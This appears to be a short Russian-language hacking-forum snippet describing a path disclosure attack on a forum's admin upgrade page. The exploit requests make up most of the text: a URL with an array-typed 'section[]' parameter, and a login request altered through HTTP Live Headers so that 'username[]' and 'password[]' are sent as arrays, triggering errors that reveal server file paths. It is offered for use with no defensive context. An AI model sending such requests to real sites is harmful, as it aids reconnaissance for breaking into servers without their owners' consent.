Раскрытие путей.
 (должен быть доступен upgrade)
http://форум/admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login
Также раскрытие доступно через. HTTP Live Header. Смотрим заголовки,меняем в 
http://форум/admin/upgrade/index.php?app=upgrade&s=&section=index&do=login запрос
do=login&username=asd&password=asd(пример запроса)
на do=login&username[]=asd&password[]=asd